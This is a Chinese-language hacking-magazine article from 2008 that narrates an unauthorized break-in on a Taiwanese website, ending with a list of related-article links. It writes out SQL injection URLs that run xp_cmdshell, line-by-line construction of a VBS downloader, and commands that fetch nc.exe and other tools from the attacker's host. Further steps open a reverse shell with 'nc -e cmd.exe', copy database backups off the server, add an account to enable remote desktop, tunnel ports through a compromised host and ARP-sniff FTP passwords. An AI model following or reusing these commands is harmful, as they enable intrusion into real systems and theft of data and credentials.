入侵過程中的簡單任務(wù)
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:36:00 作者:佚名
我要評論

很久沒有入侵了,手有點(diǎn)癢,隨便逛了幾個TW的網(wǎng)站想找一個有點(diǎn)的價值的網(wǎng)站玩玩,于是找到了這個網(wǎng)站。
習(xí)慣性的,在“報名賬號”處填入了一個單引號,返回了如下信息:
SQL Server 的 Microsoft OLE DB 提供者 (0x80040E14)
遺漏字符字符串 &apos
很久沒有入侵了,手有點(diǎn)癢,隨便逛了幾個TW的網(wǎng)站想找一個有點(diǎn)的價值的網(wǎng)站玩玩,于是找到了這個網(wǎng)站。
習(xí)慣性的,在“報名賬號”處填入了一個單引號,返回了如下信息:
SQL Server 的 Microsoft OLE DB 提供者 (0x80040E14)
遺漏字符字符串 ''' 前面的引號。
/rdshow/modify.asp, line 5
看來是存在注入漏洞的,來看看權(quán)限如何。繼續(xù)在登陸口輸入’ and user>0 and ‘’=’,問題出現(xiàn)了:無法完整輸入??磥砭W(wǎng)頁對輸入長度做了限制,這個難不到我。保存網(wǎng)頁,將網(wǎng)頁的源代碼更改兩個地方,一處是Action=modify.asp改為Action=
[url=http://www.xxx.org.tw/rdshow/modify.asp]http://www.xxx.org.tw/rdshow/modify.asp[/url]
,還有一處就是把輸入字符的長度改大,也就是maxlength=10改為100,這下可以不受限制的隨便輸入了。將剛才的代碼完整輸入后得到以下信息:
SQL Server 的 Microsoft OLE DB 提供者 (0x80040E07)
將 nvarchar 數(shù)值 'dbo' 轉(zhuǎn)換成數(shù)據(jù)型別為 int 的數(shù)據(jù)行語法錯誤。
/rdshow/modify.asp, line 5
看來有戲,但是這樣注入太麻煩了。再看看網(wǎng)頁的源代碼,如果將這個注入漏洞轉(zhuǎn)化成URL的形式,這樣注入就方便多了。同時轉(zhuǎn)化后還有一個很好的優(yōu)點(diǎn),就是可以使用NBSI之類的注入工具,大大簡化了我們的注入過程。轉(zhuǎn)化后的URL為
[url=http://www.xxx.org.tw/rdshow/]http://www.xxx.org.tw/rdshow/[/url]
modify.asp?bidno=f**k?,F(xiàn)在WEB和SQL的主機(jī)分開的情況很多,首先我們還是先看看數(shù)據(jù)庫的IP地址吧。打開天網(wǎng),然后在IE提交:
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k’;exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k’;exec[/url]
master.dbo.xp_shell’ ping myip’;--
從天網(wǎng)的報警日志看出數(shù)據(jù)庫的IP地址為210.208.xxx.253,再Ping
[url=http://www.xxx.org.tw]www.xxx.org.tw[/url]
,得到的IP地址卻為210.208.xxx.32,看來數(shù)據(jù)庫和WEB服務(wù)器不是同一臺主機(jī),但是從IP分布來看,這兩臺主機(jī)處于同一個網(wǎng)段,理論上只要我們能攻占下數(shù)據(jù)庫主機(jī),要滲透到WEB服務(wù)器也不是難事(后來證明確實(shí)如此)。到了這一步,還是先用Superscan掃描一下數(shù)據(jù)庫主機(jī)開了些什么端口吧。
小提示:先對數(shù)據(jù)庫服務(wù)器掃描的好處有很多,比如可以探測對方是否開了防火墻,是否有FTP或者WEB服務(wù),這樣才能確定下一步該怎么注入。
掃描的結(jié)果是數(shù)據(jù)庫有防火墻,我的想法是先上傳一個NC上去,先得到一個反向的Shell再說。我嘗試了很多方法才傳上去,先用Tftp沒有成功,F(xiàn)TP也沒有成功。如果數(shù)據(jù)庫有WEB服務(wù)的話還可以寫入一個WebShell,可惜沒有。沒有辦法,只好寫Iget.vbs(腳本小子:廣告時間!黑防上個月開放的下載系統(tǒng)中有下載,地址是
[url=http://www.hacker.com.cn/downweb/index.asp]www.hacker.com.cn/downweb/index.asp[/url]
,里面還有一些小東西也挺不錯,歡迎大家下載使用,并推薦你覺得功能上有特點(diǎn)的程序),然后讓對方下載我WEB服務(wù)器上的NC。好,決定后就這樣做,繼續(xù)在IE提交:
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo iLocal = LCase(WScript.Arguments(1)) > c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo iRemote = LCase(WScript.Arguments(0)) >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo Set xPost = CreateObject("Microsoft.XMLHTTP") >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo xPost.Open "GET",iRemote,0 >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo xPost.Send() >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo Set sGet = CreateObject("ADODB.Stream") >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo sGet.Mode = 3 >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo sGet.Type = 1 >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo sGet.Open() >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo sGet.Write(xPost.responseBody) >> c:\winnt\system\p.vbs';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell'echo sGet.SaveToFile iLocal,2 >>c:\winnt\system\p.vbs';--
現(xiàn)在把NBSI2請出來,用其自帶的NB command命令執(zhí)行器查看VBS是否寫入成功(用NB TreeList目錄列表工具也可以,不過要等半天才能等到結(jié)果,我的性子急,所以選擇了前者)。
可以看出VBS生成成功了,現(xiàn)在我們可以用這個VBS去下載后門木馬之類的東西了。話不多說先把Tlist,NC,Kill傳上去再說,繼續(xù)在IE提交如下URL:
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs
[url=http://myip/nc.exe]http://myip/nc.exe[/url]
nc.exe';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs
[url=http://myip/kill.exe]http://myip/kill.exe[/url]
kill.exe';--
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs
[url=http://myip/tlist.exe]http://myip/tlist.exe[/url]
tlist.exe';--
現(xiàn)在我們可以利用上傳的NC得到一個反向的Shell了,先在本機(jī)用NC監(jiān)聽8000端口:
Nc.exe –l –v –p 8000
然后在IE輸入:
[url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url]
master.dbo.xp_cmdshell 'c:\winnt\system\nc.exe –e cmd.exe myip 8000 ';--
這樣我們就獲得了一個CmdShell了。
為什么我要上傳Tlist呢?因?yàn)槲蚁胫缹Ψ接玫氖鞘裁礆⒍拒浖@樣我們才能做到有的放矢,不至于我們上傳的東東全部被查殺。上傳Tlist還有一個原因就是剛剛開始我在繞過對方的防火墻時調(diào)用了FTP,為了不讓對方懷疑,我必須把它Kill掉,所以也得上傳Tlist來看看PID號。Tlist的結(jié)果是對方用的諾頓。
小提示:獲取對方系統(tǒng)的殺毒軟件對后面的入侵是很有幫助的,因?yàn)椴煌臍⒍拒浖Σ煌暮谲浂x的特征碼是不一樣的,也就是說某些黑軟不被金山查殺,不代表可以瞞過諾頓,反之一樣。
暈了,我菜,只會找瑞星的特征碼,諾頓的找不出來,想傳幾個反彈木馬上去的想法放棄了。上去溜了一圈發(fā)現(xiàn)D盤下面有不少數(shù)據(jù)庫的備份,我喜歡,先Down下來再說。但新的問題又來了,Tftp和TTP不能用,對方又有硬件防火墻,而Iget.vbs又只能下載,沒有辦法上傳東西,反彈木馬可以實(shí)現(xiàn)上傳但對方又有殺毒軟件……現(xiàn)在我的思路開始陷入困境,正在我一籌莫展的時候我想到了飯哥,他應(yīng)該有點(diǎn)好東東可以解決我的這個問題吧?把大概情況給他說了之后,他仰天大笑三聲之后給了我一個他自己寫的小工具:HttpPut,這個工具可以將對方的文件傳到自己的電腦上來,簡單方便。使用方法為:
Useag:E:\HttpPut.exe [URL] [PutFilePath]
Sample:E:\HttpPut.exe
[url=http://hostname/images/]http://hostname/images/[/url]
c:\p.txt
先傳了幾個Word文件,一切正常,但是當(dāng)我傳到后面較大的數(shù)據(jù)庫文件時卻發(fā)現(xiàn)不太穩(wěn)定,Shell很容易掛掉,嘗試了很多次都這樣(汗,這時進(jìn)程里面多了X個Cmd.exe,幸好我上傳了Tlist和Kill,把那些掛了的CMD一個一個地Kill掉)。
又一次陷入了困境,我本來想再去各大黑客網(wǎng)站找最新的反彈木馬,但是老天偏偏和我作對,找了半天都找不到一個滿意的。就在我快絕望的時候我的眼前突然一亮:NC不就可以突破防火墻傳文件嗎?不然怎么叫瑞士軍刀?看來我是騎驢找驢了。在NC的高級應(yīng)用里面就有傳文件的方法,具體命令如下:
nc -vv -l -p port > pathfile
nc -d myip port
然后用Winrar將所有文件(5個)打包為自解壓的exe,并將“高級自解壓選項”->“解壓后運(yùn)行”設(shè)置為_wpcap_.bat,命令行的Winpcap安裝包就制作完成了。
以上方法只是給大家參考,此時我已經(jīng)有了另外的更加簡單方便的思路,就是給數(shù)據(jù)庫的主機(jī)開終端服務(wù),這樣無論是傳東西還是繼續(xù)向內(nèi)網(wǎng)的滲透都會方便很多。大家也許會問即使你有權(quán)限添加賬號能開終端服務(wù),但是對方有防火墻你怎么連接啊。呵呵,這個問題其實(shí)很好解決,相信大家都知道VIDC類軟件吧,這類軟件的作用就是將內(nèi)網(wǎng)的端口映射到公網(wǎng)的IP端口上來,這樣我們只需要連接公網(wǎng)的IP就可以連接到內(nèi)網(wǎng)去了。在這里我用的是yyc寫的VIDC軟件的修改版,
小知識:yyc寫的VIDC軟件的修改版分客戶端和服務(wù)器端,服務(wù)器端Idc.exe在具有公網(wǎng)IP的肉雞上運(yùn)行,使用默認(rèn)8080端口通信。
直接在肉雞運(yùn)行就OK了,客戶端vIDCc.exe、vIDCc.DLL,xl.ini文件,按INI文件里的配置自動連接綁定端口,INI的內(nèi)容如下:
Serverip=公網(wǎng)IP
Serverport=8080
Cip=127.0.0.1
Bport=21|80|3389
Yport=7779|7776|7778
先還是用Iget.vbs將這些東西傳上去,然后在CmdShell里面添加一個賬號,然后寫一個BAT開啟3389,等電腦重啟之后再上去運(yùn)行vIDCc.exe。OK大功告成,我們只要登陸肉雞的7778端口就可以訪問內(nèi)網(wǎng)數(shù)據(jù)了。
呵呵,現(xiàn)在我們可以在圖形界面下安裝Winpcap了,我們已經(jīng)完全控制了數(shù)據(jù)庫,但是任務(wù)還沒有完,我們先看看能不能嗅探到WEB服務(wù)器的信息。先執(zhí)行下面的命令:
tracert 210.208.xxx.32(WEB服務(wù)器的地址)
看看返回結(jié)果看來有戲,三下五除二裝好Winpcap,然后開始ArpSniffer,嗅探的命令為:
Usage: ArpSniffer [/RESET]
在這里我監(jiān)聽的是21端口,命令如下:
Arpsniffer 210.208.xxx.1 210.208.xxx.32 21 c:\winnt\system\pass.txt 1
接下來就是等待了,不過臭要飯的急著催文章,所以文章截至?xí)r還沒有結(jié)果,如果大家有興趣的話,下期我再告訴大家。這次簡單任務(wù)也該結(jié)束了,下期見!
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時,如果這個論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06Windows系統(tǒng)安全風(fēng)險-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對于加密的https,我們一直認(rèn)為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導(dǎo)致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進(jìn)入攻擊者郵箱2016-07-06